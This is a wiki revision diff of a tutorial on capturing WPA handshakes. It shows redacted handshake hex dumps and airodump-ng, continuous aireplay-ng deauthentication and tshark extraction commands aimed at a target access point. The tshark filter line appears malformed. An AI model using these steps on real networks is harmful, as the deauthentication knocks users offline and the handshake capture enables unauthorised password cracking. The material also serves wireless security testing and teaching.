Differences

This shows you the differences between two versions of the page.

--- capture_wpa_handshake [2014/06/12 20:08] – admin
+++ capture_wpa_handshake [2014/06/14 22:01] – admin
@@ Line 101: / Line 101: @@
 [*] anonce:
 B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
-5B 29 78 B5 FF DB 5B 35 CC 2B 53 C0 50 A0 45
+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
 [*] snonce:
     C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
-    DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96 4E
+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
 [*] Key MIC:
     AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
 [*] eapol:
 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
-C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24
+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
-    AC DA 9B 56 4E 9B 16 27 49 8B 65 A4 D3 D9 64 96
+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
 E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC
+    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
 01 00 00 0F AC 02 0C 00
@@ Line 167: / Line 167: @@
 wlan0		Intel 6235	iwlwifi - [phy0]
 				(monitor mode enabled on mon0)</code>
-  * Find nearest wireless networks. <code># airodump-ng mon0
+  * Find nearest wireless networks. If targetting specific AP, fix channel with '-c <chan_num>' <code># airodump-ng mon0
  CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
@@ Line 205: / Line 205: @@
 :49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1
  C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e     0        4</code>
-  * Dump packets from target channel. <code># airodump-ng --channel 11 --write channel11 mon0</code>
+  * Dump packets from target channel. <code># airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0</code>
   * Wait for handshake... or
   * Deauthenticate client from network. <code># aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0</code>
   * Or if you don't know the MAC of any associated client, broadcast a deauth. <code># aireplay-ng --deauth 0 -a <AP_MAC> mon0</code>
   * Extract handshakes. <code>tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name></code>